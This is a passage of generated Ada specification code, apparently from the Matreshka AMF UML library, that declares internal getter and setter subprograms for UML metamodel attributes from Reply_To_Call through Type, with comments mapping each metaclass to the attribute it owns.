Internal_Get_Reply_To_Call (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Reply_To_Call (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ReplyAction => ReplyAction::replyToCall function Internal_Get_Reply_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ReplyAction => ReplyAction::replyValue function Internal_Get_Representation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Representation (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Activity => Classifier::representation -- Actor => Classifier::representation -- Artifact => Classifier::representation -- Association => Classifier::representation -- AssociationClass => Classifier::representation -- Class => Classifier::representation -- Collaboration => Classifier::representation -- CommunicationPath => Classifier::representation -- Component => Classifier::representation -- DataType => Classifier::representation -- DeploymentSpecification => Classifier::representation -- Device => Classifier::representation -- Enumeration => Classifier::representation -- ExecutionEnvironment => Classifier::representation -- Extension => Classifier::representation -- FunctionBehavior => Classifier::representation -- InformationItem => Classifier::representation -- Interaction => Classifier::representation -- Interface => Classifier::representation -- Node => Classifier::representation -- OpaqueBehavior => Classifier::representation -- PrimitiveType => Classifier::representation -- ProtocolStateMachine => Classifier::representation -- Signal => Classifier::representation -- StateMachine => Classifier::representation -- Stereotype => Classifier::representation -- UseCase => Classifier::representation function Internal_Get_Represented (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InformationItem => InformationItem::represented function Internal_Get_Represents (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Represents (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActivityPartition => ActivityPartition::represents -- Lifeline => Lifeline::represents function Internal_Get_Request (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Request (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- SendObjectAction => SendObjectAction::request function Internal_Get_Required (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Component => Component::required -- Port => Port::required function Internal_Get_Resolution (Self : AMF.Internals.AMF_Element) return AMF.Real; procedure Internal_Set_Resolution (Self : AMF.Internals.AMF_Element; To : AMF.Real); -- UMLActivityDiagram => Diagram::resolution -- UMLClassDiagram => Diagram::resolution -- UMLComponentDiagram => Diagram::resolution -- UMLCompositeStructureDiagram => Diagram::resolution -- UMLDeploymentDiagram => Diagram::resolution -- UMLInteractionDiagram => Diagram::resolution -- UMLObjectDiagram => Diagram::resolution -- UMLPackageDiagram => Diagram::resolution -- UMLProfileDiagram => Diagram::resolution -- UMLStateMachineDiagram => Diagram::resolution -- UMLUseCaseDiagram => Diagram::resolution function Internal_Get_Result (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => AcceptEventAction::result -- AcceptEventAction => AcceptEventAction::result -- CallBehaviorAction => CallAction::result -- CallOperationAction => CallAction::result -- ConditionalNode => ConditionalNode::result -- LoopNode => LoopNode::result -- StartObjectBehaviorAction => CallAction::result -- UnmarshallAction => UnmarshallAction::result function Internal_Get_Result (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Result (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AddStructuralFeatureValueAction => WriteStructuralFeatureAction::result -- ClearStructuralFeatureAction => ClearStructuralFeatureAction::result -- CreateLinkObjectAction => CreateLinkObjectAction::result -- CreateObjectAction => CreateObjectAction::result -- OpaqueExpression => OpaqueExpression::result -- ReadExtentAction => ReadExtentAction::result -- ReadIsClassifiedObjectAction => ReadIsClassifiedObjectAction::result -- ReadLinkAction => ReadLinkAction::result -- ReadLinkObjectEndAction => ReadLinkObjectEndAction::result -- ReadLinkObjectEndQualifierAction => ReadLinkObjectEndQualifierAction::result -- ReadSelfAction => ReadSelfAction::result -- ReadStructuralFeatureAction => ReadStructuralFeatureAction::result -- ReadVariableAction => ReadVariableAction::result -- ReduceAction => ReduceAction::result -- RemoveStructuralFeatureValueAction => WriteStructuralFeatureAction::result -- TestIdentityAction => TestIdentityAction::result -- ValueSpecificationAction => ValueSpecificationAction::result function Internal_Get_Return_Information (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Return_Information (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AcceptCallAction => AcceptCallAction::returnInformation -- ReplyAction => ReplyAction::returnInformation function Internal_Get_Return_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Return_Value (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InteractionUse => InteractionUse::returnValue -- PartDecomposition => InteractionUse::returnValue function Internal_Get_Return_Value_Recipient (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Return_Value_Recipient (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InteractionUse => InteractionUse::returnValueRecipient -- PartDecomposition => InteractionUse::returnValueRecipient function Internal_Get_Role (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Role (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ConnectorEnd => ConnectorEnd::role function Internal_Get_Role (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => StructuredClassifier::role -- AssociationClass => StructuredClassifier::role -- Class => StructuredClassifier::role -- Collaboration => StructuredClassifier::role -- Component => StructuredClassifier::role -- Device => StructuredClassifier::role -- ExecutionEnvironment => StructuredClassifier::role -- FunctionBehavior => StructuredClassifier::role -- Interaction => StructuredClassifier::role -- Node => StructuredClassifier::role -- OpaqueBehavior => StructuredClassifier::role -- ProtocolStateMachine => StructuredClassifier::role -- StateMachine => StructuredClassifier::role -- Stereotype => StructuredClassifier::role function Internal_Get_Role_Binding (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- CollaborationUse => CollaborationUse::roleBinding function Internal_Get_Scope (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Scope (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Variable => Variable::scope function Internal_Get_Second (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Second (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TestIdentityAction => TestIdentityAction::second function Internal_Get_Selection (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Selection (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionInputPin => ObjectNode::selection -- ActivityParameterNode => ObjectNode::selection -- CentralBufferNode => ObjectNode::selection -- DataStoreNode => ObjectNode::selection -- ExpansionNode => ObjectNode::selection -- InputPin => ObjectNode::selection -- ObjectFlow => ObjectFlow::selection -- OutputPin => ObjectNode::selection -- ValuePin => ObjectNode::selection function Internal_Get_Selector (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Selector (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Lifeline => Lifeline::selector function Internal_Get_Send_Event (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Send_Event (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Message => Message::sendEvent function Internal_Get_Setting (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Setting (Self : AMF.Internals.AMF_Element; To : Boolean); -- Continuation => Continuation::setting function Internal_Get_Setup_Part (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- LoopNode => LoopNode::setupPart function Internal_Get_Shared_Style (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Shared_Style (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UMLActivityDiagram => UMLDiagramElement::sharedStyle -- UMLAssociationEndLabel => UMLDiagramElement::sharedStyle -- UMLAssociationOrConnectorOrLinkShape => UMLDiagramElement::sharedStyle -- UMLClassDiagram => UMLDiagramElement::sharedStyle -- UMLClassifierShape => UMLDiagramElement::sharedStyle -- UMLCompartment => UMLDiagramElement::sharedStyle -- UMLCompartmentableShape => UMLDiagramElement::sharedStyle -- UMLComponentDiagram => UMLDiagramElement::sharedStyle -- UMLCompositeStructureDiagram => UMLDiagramElement::sharedStyle -- UMLDeploymentDiagram => UMLDiagramElement::sharedStyle -- UMLEdge => UMLDiagramElement::sharedStyle -- UMLInteractionDiagram => UMLDiagramElement::sharedStyle -- UMLInteractionTableLabel => UMLDiagramElement::sharedStyle -- UMLKeywordLabel => UMLDiagramElement::sharedStyle -- UMLLabel => UMLDiagramElement::sharedStyle -- UMLMultiplicityLabel => UMLDiagramElement::sharedStyle -- UMLNameLabel => UMLDiagramElement::sharedStyle -- UMLObjectDiagram => UMLDiagramElement::sharedStyle -- UMLPackageDiagram => UMLDiagramElement::sharedStyle -- UMLProfileDiagram => UMLDiagramElement::sharedStyle -- UMLRedefinesLabel => UMLDiagramElement::sharedStyle -- UMLShape => UMLDiagramElement::sharedStyle -- UMLStateMachineDiagram => UMLDiagramElement::sharedStyle -- UMLStateShape => UMLDiagramElement::sharedStyle -- UMLStereotypePropertyValueLabel => UMLDiagramElement::sharedStyle -- UMLTypedElementLabel => UMLDiagramElement::sharedStyle -- UMLUseCaseDiagram => UMLDiagramElement::sharedStyle function Internal_Get_Signal (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Signal (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- BroadcastSignalAction => BroadcastSignalAction::signal -- Reception => Reception::signal -- SendSignalAction => SendSignalAction::signal -- SignalEvent => SignalEvent::signal function Internal_Get_Signature (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Signature (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ClassifierTemplateParameter => TemplateParameter::signature -- ConnectableElementTemplateParameter => TemplateParameter::signature -- Message => Message::signature -- OperationTemplateParameter => TemplateParameter::signature -- TemplateBinding => TemplateBinding::signature -- TemplateParameter => TemplateParameter::signature function Internal_Get_Slot (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- EnumerationLiteral => InstanceSpecification::slot -- InstanceSpecification => InstanceSpecification::slot function Internal_Get_Source (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Source (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ControlFlow => ActivityEdge::source -- UMLEdge => UMLEdge::source -- ObjectFlow => ActivityEdge::source -- ProtocolTransition => Transition::source -- Transition => Transition::source function Internal_Get_Source (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => DirectedRelationship::source -- ComponentRealization => DirectedRelationship::source -- Dependency => DirectedRelationship::source -- Deployment => DirectedRelationship::source -- ElementImport => DirectedRelationship::source -- Extend => DirectedRelationship::source -- Generalization => DirectedRelationship::source -- Include => DirectedRelationship::source -- InformationFlow => DirectedRelationship::source -- InterfaceRealization => DirectedRelationship::source -- Manifestation => DirectedRelationship::source -- PackageImport => DirectedRelationship::source -- PackageMerge => DirectedRelationship::source -- ProfileApplication => DirectedRelationship::source -- ProtocolConformance => DirectedRelationship::source -- Realization => DirectedRelationship::source -- Substitution => DirectedRelationship::source -- TemplateBinding => DirectedRelationship::source -- Usage => DirectedRelationship::source function Internal_Get_Specific (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Specific (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Generalization => Generalization::specific function Internal_Get_Specific_Machine (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Specific_Machine (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProtocolConformance => ProtocolConformance::specificMachine function Internal_Get_Specification (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Specification (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Activity => Behavior::specification -- Constraint => Constraint::specification -- DurationConstraint => Constraint::specification -- EnumerationLiteral => InstanceSpecification::specification -- FunctionBehavior => Behavior::specification -- InstanceSpecification => InstanceSpecification::specification -- Interaction => Behavior::specification -- InteractionConstraint => Constraint::specification -- IntervalConstraint => Constraint::specification -- OpaqueBehavior => Behavior::specification -- ProtocolStateMachine => Behavior::specification -- StateMachine => Behavior::specification -- TimeConstraint => Constraint::specification function Internal_Get_Start (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Start (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionExecutionSpecification => ExecutionSpecification::start -- BehaviorExecutionSpecification => ExecutionSpecification::start function Internal_Get_State (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_State (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ConnectionPointReference => ConnectionPointReference::state -- Pseudostate => Pseudostate::state -- Region => Region::state function Internal_Get_State_Invariant (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_State_Invariant (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- FinalState => State::stateInvariant -- State => State::stateInvariant function Internal_Get_State_Machine (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_State_Machine (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Pseudostate => Pseudostate::stateMachine -- Region => Region::stateMachine function Internal_Get_Stereotyped_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Stereotyped_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UMLStereotypePropertyValueLabel => UMLStereotypePropertyValueLabel::stereotypedElement function Internal_Get_Structural_Feature (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Structural_Feature (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AddStructuralFeatureValueAction => StructuralFeatureAction::structuralFeature -- ClearStructuralFeatureAction => StructuralFeatureAction::structuralFeature -- ReadStructuralFeatureAction => StructuralFeatureAction::structuralFeature -- RemoveStructuralFeatureValueAction => StructuralFeatureAction::structuralFeature function Internal_Get_Structured_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Activity::structuredNode function Internal_Get_Structured_Node_Input (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ConditionalNode => StructuredActivityNode::structuredNodeInput -- ExpansionRegion => StructuredActivityNode::structuredNodeInput -- LoopNode => StructuredActivityNode::structuredNodeInput -- SequenceNode => StructuredActivityNode::structuredNodeInput -- StructuredActivityNode => StructuredActivityNode::structuredNodeInput function Internal_Get_Structured_Node_Output (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ConditionalNode => StructuredActivityNode::structuredNodeOutput -- ExpansionRegion => StructuredActivityNode::structuredNodeOutput -- LoopNode => StructuredActivityNode::structuredNodeOutput -- SequenceNode => StructuredActivityNode::structuredNodeOutput -- StructuredActivityNode => StructuredActivityNode::structuredNodeOutput function Internal_Get_Sub_Expression (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- StringExpression => StringExpression::subExpression function Internal_Get_Subgroup (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ActivityPartition => ActivityGroup::subgroup -- ConditionalNode => ActivityGroup::subgroup -- ExpansionRegion => ActivityGroup::subgroup -- InterruptibleActivityRegion => ActivityGroup::subgroup -- LoopNode => ActivityGroup::subgroup -- SequenceNode => ActivityGroup::subgroup -- StructuredActivityNode => ActivityGroup::subgroup function Internal_Get_Subject (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- UseCase => UseCase::subject function Internal_Get_Submachine (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Submachine (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- FinalState => State::submachine -- State => State::submachine function Internal_Get_Submachine_State (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ProtocolStateMachine => StateMachine::submachineState -- StateMachine => StateMachine::submachineState function Internal_Get_Subpartition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ActivityPartition => ActivityPartition::subpartition function Internal_Get_Subsetted_Property (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ExtensionEnd => Property::subsettedProperty -- Port => Property::subsettedProperty -- Property => Property::subsettedProperty function Internal_Get_Substituting_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Substituting_Classifier (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Substitution => Substitution::substitutingClassifier function Internal_Get_Substitution (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::substitution -- Actor => Classifier::substitution -- Artifact => Classifier::substitution -- Association => Classifier::substitution -- AssociationClass => Classifier::substitution -- Class => Classifier::substitution -- Collaboration => Classifier::substitution -- CommunicationPath => Classifier::substitution -- Component => Classifier::substitution -- DataType => Classifier::substitution -- DeploymentSpecification => Classifier::substitution -- Device => Classifier::substitution -- Enumeration => Classifier::substitution -- ExecutionEnvironment => Classifier::substitution -- Extension => Classifier::substitution -- FunctionBehavior => Classifier::substitution -- InformationItem => Classifier::substitution -- Interaction => Classifier::substitution -- Interface => Classifier::substitution -- Node => Classifier::substitution -- OpaqueBehavior => Classifier::substitution -- PrimitiveType => Classifier::substitution -- ProtocolStateMachine => Classifier::substitution -- Signal => Classifier::substitution -- StateMachine => Classifier::substitution -- Stereotype => Classifier::substitution -- UseCase => Classifier::substitution function Internal_Get_Subvertex (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Region => Region::subvertex function Internal_Get_Successor_Clause (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Clause => Clause::successorClause function Internal_Get_Super_Class (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Class::superClass -- AssociationClass => Class::superClass -- Class => Class::superClass -- Component => Class::superClass -- Device => Class::superClass -- ExecutionEnvironment => Class::superClass -- FunctionBehavior => Class::superClass -- Interaction => Class::superClass -- Node => Class::superClass -- OpaqueBehavior => Class::superClass -- ProtocolStateMachine => Class::superClass -- StateMachine => Class::superClass -- Stereotype => Class::superClass function Internal_Get_Super_Group (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- ActivityPartition => ActivityGroup::superGroup -- ConditionalNode => ActivityGroup::superGroup -- ExpansionRegion => ActivityGroup::superGroup -- InterruptibleActivityRegion => ActivityGroup::superGroup -- LoopNode => ActivityGroup::superGroup -- SequenceNode => ActivityGroup::superGroup -- StructuredActivityNode => ActivityGroup::superGroup function Internal_Get_Super_Partition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Super_Partition (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActivityPartition => ActivityPartition::superPartition function Internal_Get_Supplier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => Dependency::supplier -- ComponentRealization => Dependency::supplier -- Dependency => Dependency::supplier -- Deployment => Dependency::supplier -- InterfaceRealization => Dependency::supplier -- Manifestation => Dependency::supplier -- Realization => Dependency::supplier -- Substitution => Dependency::supplier -- Usage => Dependency::supplier function Internal_Get_Symbol (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Symbol (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Expression => Expression::symbol -- StringExpression => Expression::symbol function Internal_Get_Target (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Target (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- CallOperationAction => CallOperationAction::target -- ControlFlow => ActivityEdge::target -- UMLEdge => UMLEdge::target -- DestroyObjectAction => DestroyObjectAction::target -- ObjectFlow => ActivityEdge::target -- ProtocolTransition => Transition::target -- SendObjectAction => SendObjectAction::target -- SendSignalAction => SendSignalAction::target -- Transition => Transition::target function Internal_Get_Target (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => DirectedRelationship::target -- ComponentRealization => DirectedRelationship::target -- Dependency => DirectedRelationship::target -- Deployment => DirectedRelationship::target -- ElementImport => DirectedRelationship::target -- Extend => DirectedRelationship::target -- Generalization => DirectedRelationship::target -- Include => DirectedRelationship::target -- InformationFlow => DirectedRelationship::target -- InterfaceRealization => DirectedRelationship::target -- Manifestation => DirectedRelationship::target -- PackageImport => DirectedRelationship::target -- PackageMerge => DirectedRelationship::target -- ProfileApplication => DirectedRelationship::target -- ProtocolConformance => DirectedRelationship::target -- Realization => DirectedRelationship::target -- Substitution => DirectedRelationship::target -- TemplateBinding => DirectedRelationship::target -- Usage => DirectedRelationship::target function Internal_Get_Template (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Template (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- RedefinableTemplateSignature => TemplateSignature::template -- TemplateSignature => TemplateSignature::template function Internal_Get_Template_Binding (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Template_Binding (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TemplateParameterSubstitution => TemplateParameterSubstitution::templateBinding function Internal_Get_Template_Binding (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => TemplateableElement::templateBinding -- Actor => TemplateableElement::templateBinding -- Artifact => TemplateableElement::templateBinding -- Association => TemplateableElement::templateBinding -- AssociationClass => TemplateableElement::templateBinding -- Class => TemplateableElement::templateBinding -- Collaboration => TemplateableElement::templateBinding -- CommunicationPath => TemplateableElement::templateBinding -- Component => TemplateableElement::templateBinding -- DataType => TemplateableElement::templateBinding -- DeploymentSpecification => TemplateableElement::templateBinding -- Device => TemplateableElement::templateBinding -- Enumeration => TemplateableElement::templateBinding -- ExecutionEnvironment => TemplateableElement::templateBinding -- Extension => TemplateableElement::templateBinding -- FunctionBehavior => TemplateableElement::templateBinding -- InformationItem => TemplateableElement::templateBinding -- Interaction => TemplateableElement::templateBinding -- Interface => TemplateableElement::templateBinding -- Model => TemplateableElement::templateBinding -- Node => TemplateableElement::templateBinding -- OpaqueBehavior => TemplateableElement::templateBinding -- Operation => TemplateableElement::templateBinding -- Package => TemplateableElement::templateBinding -- PrimitiveType => TemplateableElement::templateBinding -- Profile => TemplateableElement::templateBinding -- ProtocolStateMachine => TemplateableElement::templateBinding -- Signal => TemplateableElement::templateBinding -- StateMachine => TemplateableElement::templateBinding -- Stereotype => TemplateableElement::templateBinding -- StringExpression => TemplateableElement::templateBinding -- UseCase => TemplateableElement::templateBinding function Internal_Get_Template_Parameter (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Template_Parameter (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Abstraction => ParameterableElement::templateParameter -- Activity => Classifier::templateParameter -- Actor => Classifier::templateParameter -- AnyReceiveEvent => ParameterableElement::templateParameter -- Artifact => Classifier::templateParameter -- Association => Classifier::templateParameter -- AssociationClass => Classifier::templateParameter -- CallEvent => ParameterableElement::templateParameter -- ChangeEvent => ParameterableElement::templateParameter -- Class => Classifier::templateParameter -- Collaboration => Classifier::templateParameter -- CommunicationPath => Classifier::templateParameter -- Component => Classifier::templateParameter -- ComponentRealization => ParameterableElement::templateParameter -- Constraint => ParameterableElement::templateParameter -- UMLActivityDiagram => ParameterableElement::templateParameter -- UMLClassDiagram => ParameterableElement::templateParameter -- UMLComponentDiagram => ParameterableElement::templateParameter -- UMLCompositeStructureDiagram => ParameterableElement::templateParameter -- UMLDeploymentDiagram => ParameterableElement::templateParameter -- UMLInteractionDiagram => ParameterableElement::templateParameter -- UMLObjectDiagram => ParameterableElement::templateParameter -- UMLPackageDiagram => ParameterableElement::templateParameter -- UMLProfileDiagram => ParameterableElement::templateParameter -- UMLStateMachineDiagram => ParameterableElement::templateParameter -- UMLStyle => ParameterableElement::templateParameter -- UMLUseCaseDiagram => ParameterableElement::templateParameter -- DataType => Classifier::templateParameter -- Dependency => ParameterableElement::templateParameter -- Deployment => ParameterableElement::templateParameter -- DeploymentSpecification => Classifier::templateParameter -- Device => Classifier::templateParameter -- Duration => ParameterableElement::templateParameter -- DurationConstraint => ParameterableElement::templateParameter -- DurationInterval => ParameterableElement::templateParameter -- DurationObservation => ParameterableElement::templateParameter -- Enumeration => Classifier::templateParameter -- EnumerationLiteral => ParameterableElement::templateParameter -- ExecutionEnvironment => Classifier::templateParameter -- Expression => ParameterableElement::templateParameter -- Extension => Classifier::templateParameter -- ExtensionEnd => ConnectableElement::templateParameter -- FunctionBehavior => Classifier::templateParameter -- GeneralizationSet => ParameterableElement::templateParameter -- InformationFlow => ParameterableElement::templateParameter -- InformationItem => Classifier::templateParameter -- InstanceSpecification => ParameterableElement::templateParameter -- InstanceValue => ParameterableElement::templateParameter -- Interaction => Classifier::templateParameter -- InteractionConstraint => ParameterableElement::templateParameter -- Interface => Classifier::templateParameter -- InterfaceRealization => ParameterableElement::templateParameter -- Interval => ParameterableElement::templateParameter -- IntervalConstraint => ParameterableElement::templateParameter -- LiteralBoolean => ParameterableElement::templateParameter -- LiteralInteger => ParameterableElement::templateParameter -- LiteralNull => ParameterableElement::templateParameter -- LiteralReal => ParameterableElement::templateParameter -- LiteralString => ParameterableElement::templateParameter -- LiteralUnlimitedNatural => ParameterableElement::templateParameter -- Manifestation => ParameterableElement::templateParameter -- Model => ParameterableElement::templateParameter -- Node => Classifier::templateParameter -- OpaqueBehavior => Classifier::templateParameter -- OpaqueExpression => ParameterableElement::templateParameter -- Operation => Operation::templateParameter -- Package => ParameterableElement::templateParameter -- Parameter => ConnectableElement::templateParameter -- Port => ConnectableElement::templateParameter -- PrimitiveType => Classifier::templateParameter -- Profile => ParameterableElement::templateParameter -- Property => ConnectableElement::templateParameter -- ProtocolStateMachine => Classifier::templateParameter -- Realization => ParameterableElement::templateParameter -- Signal => Classifier::templateParameter -- SignalEvent => ParameterableElement::templateParameter -- StateMachine => Classifier::templateParameter -- Stereotype => Classifier::templateParameter -- StringExpression => ParameterableElement::templateParameter -- Substitution => ParameterableElement::templateParameter -- TimeConstraint => ParameterableElement::templateParameter -- TimeEvent => ParameterableElement::templateParameter -- TimeExpression => ParameterableElement::templateParameter -- TimeInterval => ParameterableElement::templateParameter -- TimeObservation => ParameterableElement::templateParameter -- Usage => ParameterableElement::templateParameter -- UseCase => Classifier::templateParameter -- Variable => ConnectableElement::templateParameter function Internal_Get_Test (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Clause => Clause::test -- LoopNode => LoopNode::test function Internal_Get_Text (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Text (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- UMLAssociationEndLabel => UMLLabel::text -- UMLInteractionTableLabel => UMLLabel::text -- UMLKeywordLabel => UMLLabel::text -- UMLLabel => UMLLabel::text -- UMLMultiplicityLabel => UMLLabel::text -- UMLNameLabel => UMLLabel::text -- UMLRedefinesLabel => UMLLabel::text -- UMLStereotypePropertyValueLabel => UMLLabel::text -- UMLTypedElementLabel => UMLLabel::text function Internal_Get_To_After (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- DestructionOccurrenceSpecification => OccurrenceSpecification::toAfter -- ExecutionOccurrenceSpecification => OccurrenceSpecification::toAfter -- MessageOccurrenceSpecification => OccurrenceSpecification::toAfter -- OccurrenceSpecification => OccurrenceSpecification::toAfter function Internal_Get_To_Before (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- DestructionOccurrenceSpecification => OccurrenceSpecification::toBefore -- ExecutionOccurrenceSpecification => OccurrenceSpecification::toBefore -- MessageOccurrenceSpecification => OccurrenceSpecification::toBefore -- OccurrenceSpecification => OccurrenceSpecification::toBefore function Internal_Get_Transformation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Transformation (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ObjectFlow => ObjectFlow::transformation function Internal_Get_Transition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Region => Region::transition function Internal_Get_Trigger (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => AcceptEventAction::trigger -- AcceptEventAction => AcceptEventAction::trigger -- ProtocolTransition => Transition::trigger -- Transition => Transition::trigger function Internal_Get_Type (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Type (Self : 